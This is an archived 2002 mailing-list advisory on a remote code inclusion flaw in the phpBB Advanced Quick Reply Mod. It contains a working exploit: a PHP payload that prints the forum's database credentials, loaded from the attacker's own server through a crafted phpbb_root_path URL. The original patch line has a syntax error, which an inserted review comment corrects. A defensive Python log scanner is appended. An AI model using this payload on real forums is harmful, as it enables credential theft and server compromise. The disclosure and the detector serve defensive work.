Code Injection in phpBB Advanced Quick Reply Mod

From: Hai Nam Luke (hainamlukeat_private)
Date: Tue Nov 12 2002 - 23:49:25 PST

    Software: phpBB Advanced Quick Reply Mod 
    
    I've found a security hole in this software (Code Injection). You can 
    download this software at http://phpbbhacks.com/viewhack.php?id=586
    Hackers can exploit this Mod to inject some shell code to hack your forum, 
    your website or your server (local exploit) because Code Injection is a 
    dangerous technique of hackers.
    
    
    Exploit: (quick_reply.php)
    
    
    if ( $mode == 'smilies' )
    {
    	define('IN_PHPBB', true);
    	include($phpbb_root_path . 'extension.inc');
    	include($phpbb_root_path . 'common.'.$phpEx);
    	include($phpbb_root_path . 'includes/functions_post.'.$phpEx);
    	generate_smilies('window', PAGE_POSTING);
    	exit;
    }
    
    
    And you can make a PHP file named 'extension.inc' for inclusion to 
    access that forum. Example:
    
    <?php
    include('config'.'.php');
    echo "DB Type: $dbms <br>";
    echo "DB Host: $dbhost <br>";
    echo "DB Name: $dbname <br>";
    echo "DB User: $dbuser <br>";
    echo "DB Pass: $dbpasswd <br>";
    exit;
    ?>
    
    After that, you upload this file to your server (http://[Your 
    Server]/extension.inc) and  enter URL
    http://[phpBB_Forum]/quick_reply.php?phpbb_root_path=http://[Your 
    Server]/&mode=smiles
    You'll receive all DB info of the forum.
    
    
    Patch: (quick_reply.php) 
    
    [FIND]
    if ( $mode == 'smilies' )
    {
    [ADD BEFORE]
    phpbb_root_path = "./";
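
Review bot: the added line `phpbb_root_path = "./";` has no `$` sigil, so as written it is not a variable assignment and PHP will not accept it; it should read `$phpbb_root_path = "./";`. Placed before the `if ( $mode == 'smilies' )` block, the corrected assignment fixes the prefix used by the three `include()` calls in the quoted code, so a value supplied in the query string no longer reaches them.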
    
    Sorry for my poor English. 
    Luke (HVA)
    http://www.hackervn.net
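
For defenders reviewing web server logs for the request pattern described in this advisory, the following is an added example and not part of the original post. It flags any request that supplies `phpbb_root_path` as a query parameter, on the assumption (consistent with the patch above, which hard-codes the value) that no legitimate client ever sends it. The log format, IP addresses and host names are constructed sample data.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Client IP and request target from a common/combined-format access log line.
REQUEST_RE = re.compile(r'^(\S+) .*?"[A-Z]+ (\S+) HTTP/[\d.]+"')
# A URL scheme, protocol-relative prefix or UNC prefix: the include is remote.
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.-]*:|//|\\\\)', re.I)
PARAM = "phpbb_root_path"

# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Nov/2002:23:10:01 -0800] "GET /forum/quick_reply.php'
    '?phpbb_root_path=http%3A%2F%2Fhost.example%2F&mode=smilies HTTP/1.0" 200 512',
    '198.51.100.4 - - [12/Nov/2002:23:11:40 -0800] "GET /forum/quick_reply.php'
    '?mode=smilies HTTP/1.0" 200 2048',
    '203.0.113.9 - - [12/Nov/2002:23:12:02 -0800] "GET /forum/quick_reply.php'
    '?phpbb.root_path=../../tmp/&mode=smilies HTTP/1.0" 200 90',
]


def normalize_name(name):
    """Mirror PHP: dots and spaces in request names become underscores,
    and an array suffix such as name[] still targets the same variable."""
    return re.sub(r"[ .]", "_", name).split("[")[0]


def classify(line):
    """Return None, or (ip, path, verdict, value) when the request sets PARAM."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    ip, target = m.groups()
    url = urlsplit(target)
    # parse_qsl percent-decodes once, as PHP does for incoming parameters.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if normalize_name(name) != PARAM:
            continue
        verdict = "remote-include" if REMOTE_RE.match(value) else "path-override"
        return (ip, url.path, verdict, value)
    return None


def scan(lines):
    """Collect every flagged request from an iterable of log lines."""
    return [hit for hit in map(classify, lines) if hit]
```

Both verdicts deserve follow-up: `remote-include` means the value pointed at another host, while `path-override` means the include prefix was redirected to a different local directory.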
    



    This archive was generated by hypermail 2b30 : Fri Nov 15 2002 - 13:18:26 PST